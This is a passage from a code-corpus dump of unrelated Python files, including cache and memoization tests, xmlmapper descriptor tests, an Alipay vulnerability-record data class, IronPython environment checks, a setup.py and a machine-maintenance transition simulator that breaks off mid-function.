id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
107428 | #!/usr/bin/env python
__author__ = '<NAME>'
from strongdict import StrongDict, memo, memo_until, nmemo
def test_simple():
'Testing strong dictionary.'
v = StrongDict()
v['One'] = 1
v[2] = 2
v['Three'] = 'Three'
assert v['One'] == 1
assert v[2] == 2
assert v['One'] == 1
assert v['Three'] == 'Three'
return
def test_iteritems():
'''Testing iteritems'''
w = StrongDict()
w['One'] = 1
w[2] = 2
w['Three'] = 'Three'
x = {}
for k, v in w.iteritems(): x[k] = v
y = {2: 2, 'Three': 'Three', 'One': 1}
assert(x == y)
def test_instantiation():
data = {2: 2, 'Three': 'Three', 'One': 1}
v = StrongDict(data)
assert str(data) == str(v)
w = StrongDict(v)
assert str(v) == str(w)
return
def test_n_limit():
w = StrongDict(limit=3)
for i in range(10): w[i] = i * i
assert(len(w) == 3)
assert(6 not in w)
del w[8]
assert(len(w) == 2)
try:
del w[6]
assert(False)
except KeyError:
'It cannot delete w[7] since it is not there.'
assert(True)
del w[9]
assert(9 not in w)
x = {}
for i in range(4):
w[i] = x[i]= i * i
del x[0]
assert(w == x)
def test_time_limit():
from time import sleep
w = StrongDict(tlimit=2)
w[1] = 'One'
sleep(1)
w['Two'] = 2
x ={1:'One', 'Two':2}
assert(x == w)
sleep(1)
w['Three'] = 'Three'
sleep(1)
x = {'Three':'Three'}
assert(w == x)
sleep(3)
assert(len(w) == 0)
def test_retention():
import gc
'''Test if weak reference forget objects deleted from the cache.'''
limit = 3
w = StrongDict(limit=limit)
n = 50
for i in range(n):
x = [1]
w[i] = x
x = None
assert(limit == len(w))
w.clear()
assert(0 == len(w))
# w.weak_len() could be non zero depending on garbage collection activity.
assert (w.weak_len() <= limit)
gc.collect()
assert(0 == w.weak_len())
class TestMemoFlag(object):
def __init__(self): self.__flag = False
def __call__(self, f): self.__flag = True if f else False
def __eq__(self, f): return self.__flag == f
def test_memo():
'''
Test @memo decorator.
Memoized foo() only executes for new values of x.
'''
tmf = TestMemoFlag()
@memo
def foo(x):
tmf(True) # will only execute if value of x is used for the first time.
return x
foo(1)
assert(True == tmf)
tmf(False)
foo(2)
assert(True == tmf)
tmf(False)
foo(1)
assert(False == tmf) # arg 1 should be remembered so tmf will be false.
def test_memo_until():
'''
Test @memo_until decorator.
Memoized foo() only executes for new values of x or if time limit expired.
'''
from time import sleep
tmf = TestMemoFlag()
@memo_until(tlimit=1)
def foo(x):
tmf(True) # will only execute if value of x is used for the first time.
return x
foo(1)
assert(True == tmf)
tmf(False)
foo(1)
assert(False == tmf)
sleep(2)
tmf(False)
foo(1)
assert(True == tmf)
tmf(False)
foo(1)
assert(1 == foo('size_elephant_cache'))
foo('clear_elephant_cache')
tmf(False)
foo(1)
def test_nmemo():
'''
Test @nmemo decorator.
'''
tmf = TestMemoFlag()
@nmemo(3)
def foo(x):
tmf(True) # will only execute if value of x is used for the first time.
return x
tmf(False)
foo(1)
assert(True == tmf)
tmf(False)
foo(2)
assert(True == tmf)
tmf(False)
foo(1)
assert(False == tmf)
tmf(False)
foo(3)
assert(True == tmf)
tmf(False)
foo(4)
assert(True == tmf)
tmf(False)
foo(5)
assert(True == tmf)
tmf(False)
foo(6)
assert(True == tmf)
tmf(False)
foo(1)
assert(True == tmf)
assert(3 == foo('size_elephant_cache'))
def test_clear():
@memo
def g(x): return x
assert(5 == g(5))
assert(5 == g(5))
assert(6 == g(6))
g('clear_elephant_cache')
assert(5 == g(5))
if __name__ == "__main__":
import sys
usage = '''
Run one of the nose tests listed below using the command shown.
Run one of the nose test methods in a debugger by invoking this module with
the nose test method as the argument.
$ pdb test_strongdict.py test_simple
'''
print usage
for i in dir():
if i.startswith('test'):
print 'nosetests -s', __file__ + ':' + i
print
if len(sys.argv) > 1:
f_name = sys.argv[1]
try:
f = globals()[f_name]
print 'About to run', f_name, '...'
f() # Set breakpoint here in debugger to step into given method.
except KeyError:
print 'Could not find named method.'
else:
print 'Usage:', __file__, '[method]'
| StarcoderdataPython |
49162 | from redesigned_barnacle.buffer import CircularBuffer
from redesigned_barnacle.graph import Sparkline
from redesigned_barnacle.mock import MockFramebuffer
from unittest import TestCase
class SparkTest(TestCase):
def test_line(self):
buf = CircularBuffer()
sl = Sparkline(32, 64, buf)
sl.push(16)
sl.draw(MockFramebuffer(), 0, 0) | StarcoderdataPython |
3366842 | <reponame>prathimacode-hub/PythonScripts
class Computer:
def __init__(self,cpu,ram): #Constructor
self.cpu=cpu
self.ram=ram
def config(self): #Method inside class
print("The Configuration",self.cpu,self.ram)
HP=Computer("Intel",8) #instances
Dell=Computer("Intel1",10)
print(id(HP))
HP.config()
Dell.config()
| StarcoderdataPython |
3372225 | <filename>alipay/aop/api/domain/VulInfo.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class VulInfo(object):
def __init__(self):
self._attachment = None
self._business = None
self._coin = None
self._company = None
self._confirm_level = None
self._confirm_time = None
self._detail = None
self._fix_time = None
self._level = None
self._mobile_phone = None
self._name = None
self._nick = None
self._reject_reason = None
self._score = None
self._status = None
self._submit_time = None
self._type_sub_first_id = None
self._type_sub_first_name = None
self._type_sub_second_id = None
self._type_sub_second_name = None
self._url = None
self._vul_id = None
@property
def attachment(self):
return self._attachment
@attachment.setter
def attachment(self, value):
self._attachment = value
@property
def business(self):
return self._business
@business.setter
def business(self, value):
self._business = value
@property
def coin(self):
return self._coin
@coin.setter
def coin(self, value):
self._coin = value
@property
def company(self):
return self._company
@company.setter
def company(self, value):
self._company = value
@property
def confirm_level(self):
return self._confirm_level
@confirm_level.setter
def confirm_level(self, value):
self._confirm_level = value
@property
def confirm_time(self):
return self._confirm_time
@confirm_time.setter
def confirm_time(self, value):
self._confirm_time = value
@property
def detail(self):
return self._detail
@detail.setter
def detail(self, value):
self._detail = value
@property
def fix_time(self):
return self._fix_time
@fix_time.setter
def fix_time(self, value):
self._fix_time = value
@property
def level(self):
return self._level
@level.setter
def level(self, value):
self._level = value
@property
def mobile_phone(self):
return self._mobile_phone
@mobile_phone.setter
def mobile_phone(self, value):
self._mobile_phone = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def nick(self):
return self._nick
@nick.setter
def nick(self, value):
self._nick = value
@property
def reject_reason(self):
return self._reject_reason
@reject_reason.setter
def reject_reason(self, value):
self._reject_reason = value
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def submit_time(self):
return self._submit_time
@submit_time.setter
def submit_time(self, value):
self._submit_time = value
@property
def type_sub_first_id(self):
return self._type_sub_first_id
@type_sub_first_id.setter
def type_sub_first_id(self, value):
self._type_sub_first_id = value
@property
def type_sub_first_name(self):
return self._type_sub_first_name
@type_sub_first_name.setter
def type_sub_first_name(self, value):
self._type_sub_first_name = value
@property
def type_sub_second_id(self):
return self._type_sub_second_id
@type_sub_second_id.setter
def type_sub_second_id(self, value):
self._type_sub_second_id = value
@property
def type_sub_second_name(self):
return self._type_sub_second_name
@type_sub_second_name.setter
def type_sub_second_name(self, value):
self._type_sub_second_name = value
@property
def url(self):
return self._url
@url.setter
def url(self, value):
self._url = value
@property
def vul_id(self):
return self._vul_id
@vul_id.setter
def vul_id(self, value):
self._vul_id = value
def to_alipay_dict(self):
params = dict()
if self.attachment:
if hasattr(self.attachment, 'to_alipay_dict'):
params['attachment'] = self.attachment.to_alipay_dict()
else:
params['attachment'] = self.attachment
if self.business:
if hasattr(self.business, 'to_alipay_dict'):
params['business'] = self.business.to_alipay_dict()
else:
params['business'] = self.business
if self.coin:
if hasattr(self.coin, 'to_alipay_dict'):
params['coin'] = self.coin.to_alipay_dict()
else:
params['coin'] = self.coin
if self.company:
if hasattr(self.company, 'to_alipay_dict'):
params['company'] = self.company.to_alipay_dict()
else:
params['company'] = self.company
if self.confirm_level:
if hasattr(self.confirm_level, 'to_alipay_dict'):
params['confirm_level'] = self.confirm_level.to_alipay_dict()
else:
params['confirm_level'] = self.confirm_level
if self.confirm_time:
if hasattr(self.confirm_time, 'to_alipay_dict'):
params['confirm_time'] = self.confirm_time.to_alipay_dict()
else:
params['confirm_time'] = self.confirm_time
if self.detail:
if hasattr(self.detail, 'to_alipay_dict'):
params['detail'] = self.detail.to_alipay_dict()
else:
params['detail'] = self.detail
if self.fix_time:
if hasattr(self.fix_time, 'to_alipay_dict'):
params['fix_time'] = self.fix_time.to_alipay_dict()
else:
params['fix_time'] = self.fix_time
if self.level:
if hasattr(self.level, 'to_alipay_dict'):
params['level'] = self.level.to_alipay_dict()
else:
params['level'] = self.level
if self.mobile_phone:
if hasattr(self.mobile_phone, 'to_alipay_dict'):
params['mobile_phone'] = self.mobile_phone.to_alipay_dict()
else:
params['mobile_phone'] = self.mobile_phone
if self.name:
if hasattr(self.name, 'to_alipay_dict'):
params['name'] = self.name.to_alipay_dict()
else:
params['name'] = self.name
if self.nick:
if hasattr(self.nick, 'to_alipay_dict'):
params['nick'] = self.nick.to_alipay_dict()
else:
params['nick'] = self.nick
if self.reject_reason:
if hasattr(self.reject_reason, 'to_alipay_dict'):
params['reject_reason'] = self.reject_reason.to_alipay_dict()
else:
params['reject_reason'] = self.reject_reason
if self.score:
if hasattr(self.score, 'to_alipay_dict'):
params['score'] = self.score.to_alipay_dict()
else:
params['score'] = self.score
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.submit_time:
if hasattr(self.submit_time, 'to_alipay_dict'):
params['submit_time'] = self.submit_time.to_alipay_dict()
else:
params['submit_time'] = self.submit_time
if self.type_sub_first_id:
if hasattr(self.type_sub_first_id, 'to_alipay_dict'):
params['type_sub_first_id'] = self.type_sub_first_id.to_alipay_dict()
else:
params['type_sub_first_id'] = self.type_sub_first_id
if self.type_sub_first_name:
if hasattr(self.type_sub_first_name, 'to_alipay_dict'):
params['type_sub_first_name'] = self.type_sub_first_name.to_alipay_dict()
else:
params['type_sub_first_name'] = self.type_sub_first_name
if self.type_sub_second_id:
if hasattr(self.type_sub_second_id, 'to_alipay_dict'):
params['type_sub_second_id'] = self.type_sub_second_id.to_alipay_dict()
else:
params['type_sub_second_id'] = self.type_sub_second_id
if self.type_sub_second_name:
if hasattr(self.type_sub_second_name, 'to_alipay_dict'):
params['type_sub_second_name'] = self.type_sub_second_name.to_alipay_dict()
else:
params['type_sub_second_name'] = self.type_sub_second_name
if self.url:
if hasattr(self.url, 'to_alipay_dict'):
params['url'] = self.url.to_alipay_dict()
else:
params['url'] = self.url
if self.vul_id:
if hasattr(self.vul_id, 'to_alipay_dict'):
params['vul_id'] = self.vul_id.to_alipay_dict()
else:
params['vul_id'] = self.vul_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = VulInfo()
if 'attachment' in d:
o.attachment = d['attachment']
if 'business' in d:
o.business = d['business']
if 'coin' in d:
o.coin = d['coin']
if 'company' in d:
o.company = d['company']
if 'confirm_level' in d:
o.confirm_level = d['confirm_level']
if 'confirm_time' in d:
o.confirm_time = d['confirm_time']
if 'detail' in d:
o.detail = d['detail']
if 'fix_time' in d:
o.fix_time = d['fix_time']
if 'level' in d:
o.level = d['level']
if 'mobile_phone' in d:
o.mobile_phone = d['mobile_phone']
if 'name' in d:
o.name = d['name']
if 'nick' in d:
o.nick = d['nick']
if 'reject_reason' in d:
o.reject_reason = d['reject_reason']
if 'score' in d:
o.score = d['score']
if 'status' in d:
o.status = d['status']
if 'submit_time' in d:
o.submit_time = d['submit_time']
if 'type_sub_first_id' in d:
o.type_sub_first_id = d['type_sub_first_id']
if 'type_sub_first_name' in d:
o.type_sub_first_name = d['type_sub_first_name']
if 'type_sub_second_id' in d:
o.type_sub_second_id = d['type_sub_second_id']
if 'type_sub_second_name' in d:
o.type_sub_second_name = d['type_sub_second_name']
if 'url' in d:
o.url = d['url']
if 'vul_id' in d:
o.vul_id = d['vul_id']
return o
| StarcoderdataPython |
3354367 | import unittest
from lxml import etree
import should_be.all # noqa
import xmlmapper as mp
from xmlmapper import xml_helpers as xh
class SampleModel(mp.Model):
ROOT_ELEM = 'some_elem'
name = mp.ROOT.name
class _TestDescBase(object):
def make_present(self):
self.model._etree.append(self.elem)
def test_get_exists(self):
self.make_present()
self.desc.__get__(self.model).should_be(self.target_value)
def test_get_not_exists(self):
self.desc.__get__(self.model).should_be_none()
def test_del_exists(self):
self.make_present()
self.desc.__delete__(self.model)
def test_del_not_exists(self):
self.desc.__delete__.should_raise(AttributeError, self.model)
def test_set_exists(self):
self.make_present()
self.desc.__get__(self.model).should_be(self.target_value)
self.desc.__set__(self.model, self.alternate_value)
self.desc.__get__(self.model).should_be(self.alternate_value)
def test_set_not_exists(self):
self.desc.__set__(self.model, self.alternate_value)
self.desc.__get__(self.model).should_be(self.alternate_value)
class TestCustomNodeValue(_TestDescBase, unittest.TestCase):
def setUp(self):
self.model = SampleModel()
self.elem = etree.Element('name', lang='english')
self.target_value = 'some name'
self.alternate_value = 'some other name'
self.elem.text = self.target_value
self.desc = mp.ROOT.name['lang': 'english'] % mp.Custom(xh.load_text,
xh.dump_text)
def test_loads(self):
self.model._etree.append(self.elem)
self.desc._loads = lambda e: str(e.text) + '-hi'
self.desc.__get__(self.model).should_be(self.target_value + '-hi')
def test_dumps(self):
def set_text(v, e):
e.text = v[:-3]
return e
self.desc._dumps = set_text
self.desc.__set__(self.model, self.target_value + '-hi')
elem = self.model._etree.find('name')
elem.shouldnt_be_none()
elem.text.should_be(self.target_value)
def test_set_invalidates_cache(self):
self.model._cache = True
self.desc._cached_vals[self.model] = 'cheese'
self.desc.__set__(self.model, 'crackers')
self.desc.__get__(self.model).should_be('crackers')
self.desc._cached_vals[self.model].should_be('crackers')
def test_get_cache_disabled(self):
self.model._cache = False
self.desc.__set__(self.model, 'cheese')
self.desc.__get__(self.model).should_be('cheese')
self.model._etree.find('name').text = 'crackers'
self.desc.__get__(self.model).should_be('crackers')
def test_get_cache_enabled(self):
self.model._cache = True
self.desc._cached_vals[self.model] = 'cheese'
self.desc.__get__(self.model).should_be('cheese')
class TestNodeValue(TestCustomNodeValue):
def setUp(self):
self.model = SampleModel()
self.elem = etree.Element('name')
self.target_value = 'some value'
self.alternate_value = 'some other value'
self.elem.text = self.target_value
self.desc = mp.ROOT.name
def test_loads(self):
self.model._etree.append(self.elem)
self.desc._raw_loads = lambda v: str(v) + '-hi'
self.desc.__get__(self.model).should_be(self.target_value + '-hi')
def test_dumps(self):
self.desc._dumps = lambda v: v[:-3]
self.desc.__set__(self.model, self.target_value + '-hi')
elem = self.model._etree.find('name')
elem.shouldnt_be_none()
elem.text.should_be(self.target_value)
class TestAttributeValue(_TestDescBase, unittest.TestCase):
def setUp(self):
self.model = SampleModel()
self.elem = etree.Element('cheese')
self.target_value = 'cheddar'
self.alternate_value = 'swiss'
self.elem.set('type', 'cheddar')
self.desc = mp.ROOT.cheese['type']
class TestNodeModelValue(_TestDescBase, unittest.TestCase):
def setUp(self):
class OtherModel(mp.Model):
ROOT_ELEM = 'food'
crackers = mp.ROOT.crackers
self.model = SampleModel()
self.target_value = OtherModel()
self.target_value.crackers = 'ritz'
self.alternate_value = OtherModel()
self.alternate_value.crackers = 'whole-grain'
self.desc = mp.ROOT.food % OtherModel % {'always_present': False}
self.elem = self.target_value._etree
def test_always_present(self):
self.desc._always_present = True
self.desc.__get__(self.model).shouldnt_be_none()
class _TestNodeValueListViewBase(_TestDescBase):
@property
def init_desc(self):
return self.desc.__get__(self.model)
def make_item_present(self, content='', ind=1):
item_elem = etree.Element(self.item_elem_name, name=content)
self.elem.insert(ind, item_elem)
def test_get_item_exists(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.init_desc[0].shouldnt_be_none()
self.init_desc[0].should_be(self.alternate_value[0])
def test_get_item_not_exists(self):
self.make_present()
self.init_desc.__getitem__.should_raise(IndexError, 0)
def test_set_item_exists(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.init_desc[0] = self.alternate_value[2]
self.model._etree.findall(self.item_path).should_have_length(1)
self.model._etree.find(self.item_path).get('name').should_be(
self.alternate_value[2])
def test_set_item_not_exists(self):
self.make_present()
self.init_desc[0] = self.alternate_value[2]
self.model._etree.findall(self.item_path).should_have_length(1)
self.model._etree.find(self.item_path).get('name').should_be(
self.alternate_value[2])
def test_del_item_exists(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
del self.init_desc[0]
self.model._etree.find(self.item_path).should_be_none()
def test_del_item_not_exists(self):
self.make_present()
self.init_desc.pop.should_raise(IndexError, 0)
self.model._etree.find(self.item_path).should_be_none()
def test_always_present(self):
self.desc._always_present = True
self.init_desc.should_be([])
def test_len(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1])
len(self.desc.__get__(self.model)).should_be(2)
class TestNodeValueListView(_TestNodeValueListViewBase, unittest.TestCase):
def setUp(self):
self.model = SampleModel()
self.target_value = []
self.alternate_value = ['ritz', 'triscuit', 'wheat thins']
self.desc = mp.ROOT.food[...].cracker % (xh.attr_loader('name'),
xh.attr_dumper('name'))
self.elem = etree.Element('food')
self.item_elem_name = 'cracker'
self.item_path = 'food/cracker'
self.elem.append(etree.Element('cheese', name='cheddar'))
self.elem.append(etree.Element('cheese', name='swiss'))
def test_partial_set(self):
self.make_present()
self.make_item_present(self.alternate_value[1])
dumper = lambda v, e: e.set('like', v)
other_desc = mp.ROOT.food[...].cracker % {'loads': xh.load_text,
'dumps': dumper,
'full_replace': False}
other_init_desc = other_desc.__get__(self.model)
other_init_desc[0] = 'shredded wheat'
self.model._etree.findall(self.item_path).should_have_length(1)
elem = self.model._etree.find(self.item_path)
elem.get('like').should_be('shredded wheat')
elem.get('name').should_be(self.alternate_value[1])
def test_set_leaves_other_elems_behind(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1])
food_elem = self.model._etree.find('food')
len(food_elem).should_be(4)
self.desc.__set__(self.model, ['wheat thins'])
len(food_elem).should_be(3)
food_elem[0].tag.should_be('cheese')
food_elem[1].tag.should_be('cheese')
food_elem[2].tag.should_be('cracker')
food_elem[2].get('name').should_be('wheat thins')
def test_delete_leaves_other_elems_behind(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1])
food_elem = self.model._etree.find('food')
len(food_elem).should_be(4)
self.desc.__delete__(self.model)
len(food_elem).should_be(2)
food_elem[0].tag.should_be('cheese')
food_elem[1].tag.should_be('cheese')
def test_set_item_exists(self):
super(TestNodeValueListView, self).test_set_item_exists()
self.model._etree.findall('food/cheese').shouldnt_be_empty()
def test_set_item_not_exists(self):
super(TestNodeValueListView, self).test_set_item_not_exists()
self.model._etree.findall('food/cheese').shouldnt_be_empty()
def test_del_item_exists(self):
super(TestNodeValueListView, self).test_del_item_exists()
self.model._etree.findall('food/cheese').shouldnt_be_empty()
def test_del_item_not_exists(self):
super(TestNodeValueListView, self).test_del_item_not_exists()
self.model._etree.findall('food/cheese').shouldnt_be_empty()
def test_insert(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1], ind=3)
self.init_desc.insert(1, self.alternate_value[2])
self.model._etree.findall(self.item_path).should_have_length(3)
list(self.init_desc).should_be([self.alternate_value[0],
self.alternate_value[2],
self.alternate_value[1]])
elem = self.model._etree.find('food')[3]
elem.tag.should_be('cracker')
elem.get('name').should_be(self.alternate_value[2])
def test_delete_pred_true_removes_elem(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1])
self.desc._delete_pred = lambda e: True
del self.init_desc[0]
len(self.model._etree.findall(self.item_path)).should_be(1)
def test_delete_pred_false_keeps_elem(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1])
def del_pred(elem):
elem.attrib.pop('name')
return False
self.desc._delete_pred = del_pred
del self.init_desc[0]
len(self.model._etree.findall(self.item_path)).should_be(2)
self.model._etree.find(self.item_path).get('name',
None).should_be_none()
class TestNodeValueList(_TestNodeValueListViewBase, unittest.TestCase):
def setUp(self):
self.model = SampleModel()
self.target_value = []
self.alternate_value = ['american', 'pepperjack', 'cheddar']
self.desc = mp.ROOT.food[...] % (xh.attr_loader('name'),
xh.attr_dumper('name', 'cheese'))
self.elem = etree.Element('food')
self.item_elem_name = 'cheese'
self.item_path = 'food/cheese'
def make_present(self):
super(TestNodeValueList, self).make_present()
def test_delete_removes_node(self):
self.make_present()
self.model._etree.find('food').shouldnt_be_none()
self.desc.__delete__(self.model)
self.model._etree.find('food').should_be_none()
def test_insert(self):
self.make_present()
self.make_item_present(self.alternate_value[0])
self.make_item_present(self.alternate_value[1], ind=3)
self.init_desc.insert(1, self.alternate_value[2])
self.model._etree.findall(self.item_path).should_have_length(3)
list(self.init_desc).should_be([self.alternate_value[0],
self.alternate_value[2],
self.alternate_value[1]])
| StarcoderdataPython |
1636151 | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Microsoft Public License. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Microsoft Public License, please send an email to
# <EMAIL>. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Microsoft Public License.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
import sys
from iptest.util import get_env_var, get_temp_dir
#------------------------------------------------------------------------------
#--IronPython or something else?
is_silverlight = sys.platform == 'silverlight'
is_cli = sys.platform == 'cli'
is_ironpython = is_silverlight or is_cli
is_cpython = sys.platform == 'win32'
if is_ironpython:
#We'll use System, if available, to figure out more info on the test
#environment later
import System
import clr
#--The bittedness of the Python implementation
is_cli32, is_cli64 = False, False
if is_ironpython:
is_cli32, is_cli64 = (System.IntPtr.Size == 4), (System.IntPtr.Size == 8)
is_32, is_64 = is_cli32, is_cli64
if not is_ironpython:
cpu = get_env_var("PROCESSOR_ARCHITECTURE")
if cpu.lower()=="x86":
is_32 = True
elif cpu.lower()=="amd64":
is_64 = True
#--CLR version we're running on (if any)
is_orcas = False
if is_cli:
is_orcas = len(clr.GetClrType(System.Reflection.Emit.DynamicMethod).GetConstructors()) == 8
is_net40 = False
if is_cli:
is_net40 = System.Environment.Version.Major==4
is_dlr_in_ndp = False
if is_net40:
try:
clr.AddReference("Microsoft.Scripting.Core")
except:
is_dlr_in_ndp = True
#--Newlines
if is_ironpython:
newline = System.Environment.NewLine
else:
import os
newline = os.linesep
#--Build flavor of Python being tested
is_debug = False
if is_cli:
is_debug = sys.exec_prefix.lower().endswith("debug")
#--Are we using peverify to check that all IL generated is valid?
is_peverify_run = False
if is_cli:
is_peverify_run = is_debug and "-X:SaveAssemblies" in System.Environment.CommandLine
#--Internal checkin system used for IronPython
is_snap = False
if not is_silverlight and get_env_var("THISISSNAP")!=None:
is_snap = True
#--We only run certain time consuming test cases in the stress lab
is_stress = False
if not is_silverlight and get_env_var("THISISSTRESS")!=None:
is_stress = True
#--Are we running tests under the Vista operating system?
is_vista = False
if not is_silverlight and get_env_var("IS_VISTA")=="1":
is_vista = True
is_win7 = False
if is_ironpython: #TODO - what about CPython?
is_win7 = System.Environment.OSVersion.Version.Major==6 and System.Environment.OSVersion.Version.Minor==1
#------------------------------------------------------------------------------
| StarcoderdataPython |
3219063 | <gh_stars>0
from distutils.core import setup
setup(
name = 'PyGUIBox',
packages = ['pyguibox'],
version = '0.3',
license='MIT',
description = 'A simple cross-platform tool for creating GUI message boxes.',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/matin-me/pyguibox',
download_url = 'https://github.com/Matin-ME/PyGUIBox/archive/v_03.tar.gz',
keywords = ['Message Box', 'GUI', 'Message', 'Alert', 'Input', 'MsgBox'],
install_requires=[],
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3'
],
) | StarcoderdataPython |
175214 | <gh_stars>0
import time
import numpy as np
import random
import math
from absl import logging
from .scenes import get_map_params
from functools import partial
import math
class Transition():
"""
machine health states transition rules:
-There are 4 health states: pre-mature, mature, slightly damaged, severely damaged
"""
def __init__(self, tran_matrix, length=10, exp=False, schedule=False):
self._init_matrix(tran_matrix)
self.schedule = schedule
self.length = length
self.exp = exp
if schedule:
if not self.exp:
self.init = np.ones_like(self.T)
self.init[self.T==0] = 0
self.decay = (self.init - self.T) / length
else:
return NotImplementedError
# self.init = np.ones_like(self.T)
# print(self.T.shape, self.init.shape)
# self.init[self.T==0] = 0
# self.T[self.T == 0] = 1
# self.exp_scaling = (-1) * self.length / np.log(self.T)
def _init_matrix(self, tran_matrix):
"""
T = [[[], [], [], []],
[[], [], [], []],
[[], [], [], []]]
"""
self.T = tran_matrix
def transit(self, init_state, action, steps=None):
if not self.schedule:
T_a = self.T[action]
p = T_a[init_state]
next_state = np.random.choice(4, 1, p=p)[0]
return next_state
else:
if not self.exp:
# if steps[init_state] > self.length:
# steps = self.length
T = self.init - self.decay * np.array(steps)
T_a = T[action]
p = T_a[init_state]
p /= np.sum(p)
next_state = np.random.choice(4, 1, p=p)[0]
# print('The state is {} and the probability of not trans is {}, we trans {}, the action is {}'.format(init_state, p, trans, action))
return next_state
else:
return NotImplementedError
# T = np.exp(- np.array(steps) / self.exp_scaling)
# T_a = T[action]
# p = T_a[init_state]
# if p == 1.:
# p = 0
# else:
# p = max(self.T[action, init_state], p)
# trans = np.random.choice(2, 1, p=[p, 1-p])
# # print('The state is {} and the probability of not trans is {}, we trans {}, the action is {}'.format(init_state, p, trans, action))
# if trans:
# next_state = init_state + 1
# if next_state > 3:
# next_state %= 3
# else:
# next_state = init_state
# return next_state
class Continue_Transition():
def __init__(self, dist, first_params, second_params, lower_bounds):
assert type(dist) == str, "dist must be string"
self.dist_name = dist
self.first_params = first_params
self.second_params = second_params
self.lower_bounds = lower_bounds
if dist == 'log-normal':
self.dist = np.random.lognormal
elif dist == 'exponential':
self.dist = np.random.exponential
elif dist == 'gamma':
self.dist = np.random.gamma
elif dist == 'static':
self.dist = None
else:
raise ValueError("{} is not a predefined distributions, which has to be in [log-normal, exponential, gamma]".format(dist))
def init_trans(self, init_state):
first_param = self.first_params[init_state]
second_param = self.second_params[init_state]
lower_bound = self.lower_bounds[init_state]
if self.dist_name == 'log-normal':
mean = first_param
sigma = second_param
self.end_time = max(lower_bound, math.ceil(self.dist(mean, sigma)))
elif self.dist_name == 'exponential':
offset = first_param
scale = second_param
self.end_time = max(lower_bound, math.ceil(offset + self.dist(scale)))
elif self.dist_name == 'gamma':
shape = first_param
scale = second_param
self.end_time = max(lower_bound, math.ceil(self.dist(shape, scale)))
elif self.dist_name == 'static':
shape = first_param
scale = second_param
self.end_time = first_param
else:
raise ValueError("{} is not a predefined distributions, which has to be in [log-normal, exponential, gamma]".format(self.dist_name))
steps = random.randint(0, self.end_time-1)
self.end_time -= steps
return steps
def transit(self, init_state, action, steps=None):
if steps[init_state] == 0:
raise ValueError("wrong steps!")
if init_state != 3:
if steps[init_state] == 1:
first_param = self.first_params[init_state]
second_param = self.second_params[init_state]
lower_bound = self.lower_bounds[init_state]
if self.dist_name == 'log-normal':
mean = first_param
sigma = second_param
self.end_time = max(lower_bound, math.ceil(self.dist(mean, sigma)))
elif self.dist_name == 'exponential':
offset = first_param
scale = second_param
self.end_time = max(lower_bound, math.ceil(offset + self.dist(scale)))
elif self.dist_name == 'gamma':
shape = first_param
scale = second_param
self.end_time = max(lower_bound, math.ceil(self.dist(shape, scale)))
elif self.dist_name == 'static':
shape = first_param
self.end_time = first_param
else:
raise ValueError("{} is not a predefined distributions, which has to be in [log-normal, exponential, gamma]".format(self.dist_name))
if action != 1:
self.end_time -= 1
else:
self.end_time -= .75
if self.end_time <= 0:
init_state += 1
if init_state > 3:
init_state %= 3
# else:
# if init_state != 3:
# self.end_time -= 1
# if self.end_time == 0:
# init_state += 1
# if init_state > 3:
# init_state %= 3
else:
init_state = 0
return init_state
ACTION = {0: 1000,
1: 0,
2: (12, 3)}
class Machine():
def __init__(self, id, T, cell_id, config, time_base=False):
self.T = T
self.id = id
self.cell_id = cell_id
self.under_m = False
self.deque = 0
self.anti_jobs = 0
self.action = None
self.m_cd = 0
self.ACTION = config['actions']
self.COST = config['costs']
self.restart = 0
self.h_tracker = [[],[],[],[]]
self.init_time_base = time_base
if time_base:
self.counter = self.init_time_base
def reset(self, random_init):
self.under_m = False
self.deque = 0
self.anti_jobs = 0
self.action = None
self.m_cd = 0
self.h_tracker = [[],[],[],[]]
self.random_init = random_init
self.init_h_state(random_init)
if self.init_time_base:
self.counter = self.init_time_base
def step(self, action):
# print("machine {} takes action {} with {} time in health state {}".format(self.id, action, self.state_time[self.h_state], self.h_state))
if action == 0:
if self.init_time_base:
self.counter -= 1
assert self.h_state != 3
self.action = action
n = self.ACTION[self.action]
self.request_parts(n)
self.state_time[self.h_state] += 1
elif action == 1:
if self.init_time_base:
self.counter -= 1
assert self.h_state != 3
self.action = action
n = self.ACTION[self.action]
self.request_parts(n)
self.state_time[self.h_state] += 1
elif action == 2:
# assert self.h_state != 0 and self.h_state != 1
self.action = action
self.request_parts(0)
self.register_m()
self.state_time[self.h_state] += 1
else:
raise ValueError('action [%d] is out of range'%action)
def init_h_state(self, random_init):
if type(self.T) == Continue_Transition:
if random_init:
# print("Machine {} is random inited".format(self.id))
self.h_state = random.randint(0, 3)
steps = self.T.init_trans(self.h_state)
self.state_time = [0] * 4
self.state_time[self.h_state] = steps
if self.h_state == 3:
self.register_m()
steps = random.randint(0, self.m_cd-1)
self.m_cd -= steps
assert self.m_cd > 0
self.state_time = [0] * 4
